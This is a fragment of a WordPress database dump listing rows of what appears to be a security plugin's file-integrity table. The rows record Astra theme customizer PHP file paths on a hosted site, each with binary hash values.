('Ä+â0V·¶ŸüÊLu', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-above-footer-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-above-footer-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'è4ý”‰É¶`³ÉËèì', 'œ‘K¹pöë»\ZÍÝqˆ[VxŽ¡UhÞ\\5‹mu', '', 0, '?'),
('EÉ¡	TÅ³óŸAÖ»„', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-below-footer-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-below-footer-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ºAèÕÚÿ=#gýTŽÜ', ':„(…»(‡e‹)Át±cÚÚÍ(XÕ,åæŒZäTýÏ', '', 0, '?'),
('"i/g\nºÎSúbA™PYÓ', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-copyright-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-copyright-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9)ŽÃAa-HÉÃA¬¡‡û', 'üñIyIFª ¼[o_}7×ƒ]‡ÎîhTÙ½äÅ', '', 0, '?'),
(',¡¼ªØêþ–Ï)Q\r', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-builder-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-builder-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'äZ¨­B%T è"d{¾', '!6ÇÐÁxËú¯È¯ ð*O­¨ã¼EáÎQÏØYÄ™\Zá\0Ã', '', 0, '?'),
(':ö]±½	³™äé¢±o¦', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-menu-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-menu-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'D\n	KLFŽ^(ùèM­0–', 'å\0g±¹Lo‚3Ë%õ*,v­òÃõOÞ¹ÎòY', '', 0, '?'),
('¸ÁÂØãŠ@B^ZÎ', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-social-icons-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-social-icons-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×7ÿå×¯é*™&Bö¡¤', '&„ ªÄg"P7Âþ~õA­³•Ñ~×‰[ù%,É•‡„', '', 0, '?'),
('…Ûö4Ê¥ÿGa¬u†¡µ', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-primary-footer-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-primary-footer-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ó¸˜ÀäãõêT|s—', ' «²$¾žæ¾Ýs†¿.Õ¤g†ýý­=ßý‹ÓÑº', '', 0, '?'),
('{…¿ø„xTár†Ð2%\0÷', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-button-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-button-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“$¯þÈR&ÕT&‘Ó', 'åÜš—âÐ’¹½—?½â\0Z%ŠI™£&“H#Â>ˆS', '', 0, '?'),
('qDÈ)µR¨Ø0ìo&Ù', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-html-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-html-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '°D³,1©êŠ¶÷l¦ƒÐ', 'ó0>ìU^\Zvÿ<]xÙìt?)-½¤÷T®i‚WR)+', '', 0, '?'),
('›×´Àç\0x»vòžæ}Ö\Z', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-widget-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-widget-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'À\Zšè¶†cjY­Ì½	', ':-†bÕcSëè­p:c66J×;¾ÛZøÞæ‚\r', '', 0, '?'),
('JÌ”¼‘Ñ¤Üèõx+‡)Õs', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/above-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/above-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '[h?Æ7\ršeÐ—5a-', 'ª·|×¤K5jôOLGðŽE\\^¼îuDB9‘…¦/ûˆ†', '', 0, '?'),
('È^™\rn(¤ÔÒe%5ôUîØ', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/below-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/below-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÆÕÃjSû]Áô¨ÕØL2ù', 'fgÏ™÷Vñè0é%£Ë%\rµh©’p¥jÞK', '', 0, '?'),
('NH\0Enxcé+ÈåúÿÞ', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/button-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/button-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'û½VÉ{:¾jiuT}º?–', 'G4JYÿõçB]“ÝQ‰zž”™¤kyLcçE÷K]²i', '', 0, '?'),
('ÃŠÀ(Á®Ï''ðá0œ^7Ì', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/copyright.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/copyright.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ª@Ê3æÕäÐöOd"', 'žhéÐ«tv;Å¥<-Ëô3\\púòYd-Ù D°', '', 0, '?'),
('Ò9ÅWri2i¯—©PŸ)', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/footer-builder.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/footer-builder.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ýªíð§ iª™ý‚LÅ\0é', '?–E¨H°~^’„ÊŠn¶¤ž)í‡Rß\\''ßH¥9', '', 0, '?'),
('À\rÊ”’ÏNù{{ù™øû×Ø', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/html-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/html-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÈQ\r°Í‚»­0\rû¯F', 'I]±f€\ZÔ‘9ø¦x8HZZM$ŸHC®;…Ï', '', 0, '?'),
('ñ5/¨’À­üU{r/', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/menu-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/menu-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”á\r L¶8ªá@*@îaf', 'Ìƒ„_ÌîLâä«K^ÞD„ž°üCEŒö[­áË}Ëë', '', 0, '?'),
('yŸxûëž3¶;ñ‰yCP¤', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/primary-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/primary-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\ntÄ/òÏîQDª¬5jÏ', 'jPë”ýtµ<—ÜRR1½²u}XbJíÄµC€“é', '', 0, '?'),
('“Fk>ìE?­6¯r°dÊYî', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/social-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/social-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')\\úÌG†Œ‡l«ê', 'Éøí%Kô¸0ÆT„(ñ^÷5x1\Z?øI"ÚÂº', '', 0, '?'),
('fòVŸOu Ž~b(P6Ž\0', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/widget-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/widget-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '«“xÁáÿ–Tºá‚¼', 'ÝgUaKx*Í¡¯e6°‰Á«Yù[ÙöÞ(Æ', '', 0, '?'),
('gÈpb;ˆUŽÑ…—ä¥', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-above-header-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-above-header-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`Ž“í‚B˜ª\Z¬×wÌ', 'þ]¦(÷"bÀW4¶£œóìy‰Ôº¨Cý[º', '', 0, '?'),
('[—”šªÕàN7º¨§', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-below-header-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-below-header-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Åþ¶D§Ûs\0ù—Sc', 'œö[3*Ï%·e''¸(`Ñ§|''ªÝ¼ùXxðoo', '', 0, '?'),
('o÷''Ân`Ìà*ƒ\\EA­', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-edd-cart-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-edd-cart-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Î!7Dx¾™ovŠP_ï™', 'š•)Dfð(ÖÝÅÃÜ_¹#ïôý(qÆt\0~oš(”þ¶', '', 0, '?'),
('Áì\Z‰‰¾cð*$¯=QF', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-header-builder-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-header-builder-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ª,2“µî­Ãòªâ4GÝ	', '®œ\r´Q\0±~…4‡Â8æú> ŽK¤ÿ›¬ÿ[ÇÀ;ê~s', '', 0, '?'),
('cC¥Y`¦òÓäM¿Çÿ}=e', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-header-widget-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-header-widget-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(ÊTàÜ^[î»:¤', 'É½Ÿ”Âkq³:)¡Eœs‰v9QI[¦EÆ¡YéC', '', 0, '?'),
('ê>t¸ØÜ\ZI¯*Gs:', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-mobile-trigger-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-mobile-trigger-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'çsïº(âØ	™_=šÍÅyË', '¨Á·%?žæ¾^86ºýâ([üL˜6ƒDÅWù™	(”', '', 0, '?'),
('*uØãYê¡JÞIN›?4i¡', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-off-canvas-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-off-canvas-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥4Þ¤/—ðV¡ª\n%Œæ&', 'ÓOx 	|d¿0Ešsýj¶î?ý?+˜‚—‘¢!\\', '', 0, '?'),
('õÜ O­Ïˆ‰çh^', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-primary-header-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-primary-header-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µèu‘Y¹+¾zÓîŒ¤fè', 'YFã.0ž• {ÖÍ&õäøÞbäJÙˆl¬8ñ˜', '', 0, '?'),
(')ˆBæ2GBÒ/r.8U ', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-site-identity-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-site-identity-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÚÎ ¸Æ7Kœ’"›3', 'ñ†Á/¼|§µüzÍ¹†BR¿0bpŒãÛñdËi', '', 0, '?'),
('"”W–-s±¶x•jš¸j Ý', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-woo-cart-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-woo-cart-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '.X9ûó}ÞŽ¡QQu<)', '''G(/ˆ3¸h+(Âg¹m×¾C$eR~Cóö`O‹}', '', 0, '?'),
(')@aÎsKLžóàrç¨È²', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-account-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-account-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\Zk|iV‘$2w½÷›9Ä“<', 'Ñé,¡òí°2±G@­Œ^ÕC†ü±öÏ}šûb4Æã', '', 0, '?'),
('øÅ¦¬BšÐÀwß8µ"¹î', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-button-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-button-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'läq“’¬Zš·¥5?WYt', 'roÔQjHªÿZ†ÔÊ”)»ˆ¡ÔÐ\r''F6×9íì&+q', '', 0, '?'),
('¬YóÿÜadAjÅˆû', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-html-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-html-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'w¬Sõ(A4ÈLì÷', 'òÛzòŸ~õÜ"ÿs}‘ÔÇŽy\Z\Z!Cä¡G~Ò', '', 0, '?'),
('º çÅD. &›[%˜$K', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-menu-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-menu-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hÀ—ÊÆOIpm‡7ª‹¼', '©J›jtåôìK?µ‚r\n¦‰Ýªå/Gá‹UH­‰ÑÎ1', '', 0, '?'),
('ZùnµdBø*ôàtEH', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-search-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-search-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',€µyÕãÂ®À¶eOø', 'l"|ÃsßGÐõí4§æ†d”}9/du?›ÍvŸlÍ.', '', 0, '?'),
('U—v^ÈTÉ£&„x<ŠéP', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-social-icon-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-social-icon-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¡h“ÓuýÂ¸*@Ý¸', 'vO.€˜µc''¸d§#Ã¨ÕÄÑÒssoþ“DP¥K', '', 0, '?'),
('6×“K‹''\n‹â‹MÜ0S', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-mobile-menu-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-mobile-menu-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 's™FyÅÒ4¬!hÒ:É[<Œ', 's÷Óï\\%^«hÔjmãÕ>S¢\n°d„·¡žgÛ~”', '', 0, '?'),
('}¦3ÿ.$µGÓ*¼îó™€÷', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/above-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/above-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’Bõ[wT~[P²h''†T', 'O;a}B2•ÒK¶<¡ßjÛ™“±µ ÓIzÈéã–-Ú', '', 0, '?'),
('ƒ×†Y(h;-ÜÈ3<%', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/account.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/account.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'd÷ýá»•»áT™ôÒËA', '0¬­ÁWÜÐðqà‘¢ÑÁaÉÚ\0òÊtöIF›ª', '', 0, '?'),
('¢”ÐðÂ|pÃ0òƒEÖ', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/below-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/below-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’œŽüêJ?(¦…„žGÌ|', '£­í5Ê3\r1ÞÊ¶v$ÉJ—Ïª÷ºFCð5ZáÙËî', '', 0, '?'),
('Žžl*y¬µï‹àÇ4ÛÐ', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/button.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/button.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÊÕ[¯4´\Z ÷<þÌ^AhÄ', 'œBWÕùXä•†¦w™úU]F³—ua5¤˜''ËÈ', '', 0, '?'),
('=#»_,¬8Mu§ZÒs7', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/edd-cart.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/edd-cart.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'x\rÚè™ªþ-G°ODyß', 'q‹3å³écÖmë·Y ÁQ.ðªËè§=$PÑöJ\\o', '', 0, '?'),
('µÜuØ*HªÃOM¥rá', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/header-builder.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/header-builder.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Œ_VÔìQ¦<›iâA°', '¢Öt.cŠÆLâS!%Ø‰t«s3½Î''€Í¹\rltð', '', 0, '?'),
('8AOkùš.eTÄWÐ', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/header-widget.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/header-widget.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'YµøXUÃt_ç¥ÌÌ­]¥', 'Õ"_ÁMeÛÏd°ð.ó¥…#86¿ß³acfPÙiòb$', '', 0, '?'),
('3Kh`ª:fÐ(6YFåÛ', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/html.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/html.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹ƒÔ8*W	ÛÑkó²k5&', '¼õ¢Þóÿ\nø1S”Êà¿ŠÙ/WŽç¬À\\=»\n{', '', 0, '?'),
('L§Cê>”ÑMQÈ“™nÔ', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/menu.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/menu.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Sà€÷íJ¯wL©H', '£^P¹''ÚÒ‰dâ2]¬Xä‹=ìÜ^M[”	©ZS¿', '', 0, '?'),
('“!\Z8ˆXy¾8U)g¬H‚', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/mobile-menu.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/mobile-menu.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Gå}W¡EßûÀõ¨ZÂ', '>gV²ó²êÉÐÑšQ8âù»Mˆ²ÞÒËLPÈ?¸´E', '', 0, '?'),
('-³\\µMòßë<ÜQþá—É', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/mobile-trigger.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/mobile-trigger.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œ»™5µØ/aEQ$ëÞ^', 'Ne™Ry² £·^ÄÀûK›cìÅ)y/,úå°?¯Ö', '', 0, '?'),
(':Ü“Ñ×ÈŸ© !PÏ‰Œ', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/off-canvas.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/off-canvas.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'íÀ¢î	no®Z‚XÐ‡', '¾‹>GÌo“½ýÅf~1Åò˜oö–Á£åŒÓ	šˆ¸Àr', '', 0, '?'),
('Œ™×My‹¯KPkX®¯š#', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/primary-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/primary-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'CóÈ8 _C(\\hIs6“\\', 'Cfü6_’zèY—³[qâƒÛðo$ÍŠ0Þö', '', 0, '?'),
('>Ø˜4Pä+ub{\n"', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';+¶¡\Z€À¥ÎÖè_\0¹', '‚B¡)&™HíEºÕû Ô=É? Û¾ù¤E¥Ypýw', '', 0, '?'),
('œ*.U´.§HôàæÎ–‘', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/site-identity.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/site-identity.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '?PKÒ‰¬Ž†(ºüá}L­–', '0âFæ\\¤¡Ä	Dç¼/ž\ZlkS¾tŸôBP³çmÂ³', '', 0, '?'),
('¬‹—Â#\\µö@»¦º7', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/social.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/social.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-Ž)ÁÌHjUCA‘	­', 'ÒnÉ¢ÛÛ+}ù4¢µgf(ÜŽó}¹<h¬Î!ª£Ã“', '', 0, '?'),
('%[á×]ÓUE}3®^69', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/woo-cart.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/woo-cart.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eÙÂv¡úÇ7Üõ)ÂB', 'IÅ…Ï0£¹°Sž¤õÈ6eèïN‘BH©q©Mû–', '', 0, '?'),
('(lÛô:ã,7sõá"lR5', 'wp-content/themes/astra/inc/customizer/configurations/buttons/class-astra-customizer-button-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/buttons/class-astra-customizer-button-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ìÍÍÅ""&þÉn3¬‘Üí', '6Ì­X´¶–RU¢\0Oà4­à•Ë¼‰¤ž@YÍê«)', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('–Ú djuÔùÛr+³V', 'wp-content/themes/astra/inc/customizer/configurations/buttons/class-astra-existing-button-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/buttons/class-astra-existing-button-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÚLà\\ÊGÇ<éƒÓœ¡šÙ', 'TFã$VžNëÕüL™½!;¹(e%š‚ËœÏÚ×øÖ', '', 0, '?'),
('ðç5Hä“ý/¬›AÂ.ªŒî', 'wp-content/themes/astra/inc/customizer/configurations/class-astra-customizer-config-base.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/class-astra-customizer-config-base.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Y¤îò8‚ ‚I\nÂ—3', 'b9ÂkÃaŠîÛ¬?bš†×·Ú»Ùc‚·m5¤Éz®¹', '', 0, '?'),
('A§³ÞÖÒ!Hš„	’:>¬', 'wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-advanced-footer-colors-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-advanced-footer-colors-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '«Wßÿ_>‡e¢º²®‘.X', 'i^!ç¢O´ttÒWwªWà¹ÌzûþmÙƒÚé}¦\Z', '', 0, '?'),
('0¤Ž@ëSšÔ‡¾SÉÝ\\$?', 'wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-body-colors-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-body-colors-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'à\\ac&Ûà¨jå#ÿ', 'Vé¸ºÙ‰|™(¡&vÖ ƒ[ìÖïDÜ@é©tÞ\\ÿ:', '', 0, '?'),
('_H†_ê)žÍ8N×S21n', 'wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-footer-colors-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-footer-colors-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›î¡ÒG=ÄÝlNƒ½ü\Z', 'ðZáoòkéxZ‰¸ú=ôÚîíØÔPŽx.pM', '', 0, '?'),
(',YÕZ\\Ì²Ý½òY&“Îƒ', 'wp-content/themes/astra/inc/customizer/configurations/comments/class-astra-comments-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/comments/class-astra-comments-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"WÄL2j¡&ØE¢¾qR', 'åé”v…ÆÅIvõ]Šò…žlYÉ\n±¯jrËß~Ø¥¦õM', '', 0, '?'),
('M$ó±áàÃ”ãækâÊ|', 'wp-content/themes/astra/inc/customizer/configurations/global-misc/class-astra-global-misc-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/global-misc/class-astra-global-misc-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ûJJåï	mbH¶š,îv', 'Ø³.Ú]¦ØoVíéh‚:jFxÁïÎjŠõ1³\rX', '', 0, '?'),
